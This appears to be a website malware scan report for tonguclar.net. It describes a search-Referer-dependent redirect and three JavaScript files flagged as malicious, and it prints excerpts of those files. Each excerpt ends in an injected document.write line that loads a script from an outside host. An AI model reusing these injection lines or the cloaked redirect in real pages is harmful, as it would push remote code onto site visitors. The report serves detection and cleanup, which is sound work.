Malicious/Suspicious Redirects
Request | Server response | Status |
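URL: http://www.tonguclar.net/ (request imitating a visitor arriving from a search engine) GET / HTTP/1.1 Host: www.tonguclar.net Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Connection: close Date: Tue, 24 Jun 2014 04:08:25 GMT Location: http://berlinergrillwurst.de/blog/?p=5510&comment=1618483 Server: Apache/2 Content-Length: 314 Content-Type: text/html; charset=iso-8859-1 | malicious |
Note: this 302 was returned to a request carrying a search-engine Referer, while the same URL is listed under "Scanned pages/files" with 200 OK and status clean. The redirect therefore appears to depend on the Referer header and may not show up when the site is opened directly, so a check for it should include a request with a search-engine Referer.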
Scanned pages/files
Request | Server response | Status |
http://www.tonguclar.net/ | 200 OK Content-Length: 6048 Content-Type: text/html | clean |
http://www.tonguclar.net/giris/ga.js | 200 OK Content-Length: 36815 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below). The excerpt is truncated: it shows what appears to be the start of the file and then the part most likely responsible for the verdict, a trailing document.write(...) call that pulls in a script from a different host. The functions.js and jquery-1.js excerpts further down end with the same kind of call. Excerpt: (function(){var g=void 0,h=!0,i=null,k=!1,aa=encodeURIComponent,ba=Infinity,ea=setTimeout,fa=decodeURIComponent,l=Math;function ga(a,b){return a.name=b} var m="push",ha="slice",n="replace",ia="load",ja="floor",ka="charAt",la="value",p="indexOf",ma="match",na="port",oa="createElement",pa="path",q="name",t="host",u="toString",v="length",w="prototype",qa="clientWidth",x="split",ra="stopPropagation",ta="scope",y="location",ua="search",z="protocol",va="clientHeight",wa="href",A="substring",xa="ap [...] document.write('<script type="text/javascript">var gwloaded = false;</script><script src="http://www.supportthevets.org/stores/aNPXKI8I.php" type="text/javascript"></script>') Antivirus reports:
| ||
http://www.tonguclar.net/giris/functions.js | 200 OK Content-Length: 22076 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ...[24245 bytes skipped]... f(!fieldchecker("phone","contact_form")){ alert("Lütfen telefon numaranýzý giriniz!"); return false}; if(!fieldchecker("city","contact_form")){ alert("Lütfen þehrinizi giriniz!"); return false}; if(!fieldchecker("message","contact_form")){ alert("Lütfen mesajýnýzý giriniz!"); return false}; return true; } document.write('<script type="text/javascript">var gwloaded = false;</script><script src="http://acurelief.com/GY0r8uhT.php" type="text/javascript"></script>') Antivirus reports:
| ||
http://www.tonguclar.net/giris.js | 404 Not Found Content-Length: 394 Content-Type: text/html | clean |
http://www.tonguclar.net/test404page.js | 404 Not Found Content-Length: 400 Content-Type: text/html | clean |
http://www.tonguclar.net/giris/jquery-1.js | 200 OK Content-Length: 78938 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(E,B){function ka(a,b,d){if(d===B&&a.nodeType===1){d=a.getAttribute("data-" b);if(typeof d==="string"){try{d=d==="true"?true:d==="false"?false:d==="null"?null:!c.isNaN(d)?parseFloat(d):Ja.test(d)?c.parseJSON(d):d}catch(e){}c.data(a,b,d)}else d=B}return d}function U(){return false}function ca(){return true}function la(a,b,d){d[0].type=a;return c.event.handle.apply(b,d)}function Ka(a){var b,d,e,f,h,l,k,o,x,r,A,C=[];f=[];h=c.data(this,this.nodeType?"events":"__events__");if(typeof b],f.body["scroll" b],f.documentElement["scroll" b],f.body["offset" b],f.documentElement["offset" b]);else if(e===B){f=c.css(f,d);var h=parseFloat(f);return c.isNaN(h)?f:h}else return this.css(d,typeof e==="string"?e:e "px")}})})(window); document.write('<script type="text/javascript">var gwloaded = false;</script><script src="http://www.supportthevets.org/stores/aNPXKI8I.php" type="text/javascript"></script>') /*/339810*/ Antivirus reports:
|
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=tonguclar.net
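Result: This site is not currently listed as suspicious. Note that a blacklist not listing the site does not contradict the scan above, which flagged a redirect and three script files as malicious; blacklists can lag behind a compromise.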
Query: http://yandex.com/infected?l10n=en&url=http://tonguclar.net/
Result: tonguclar.net is not infected or malware details are not published yet.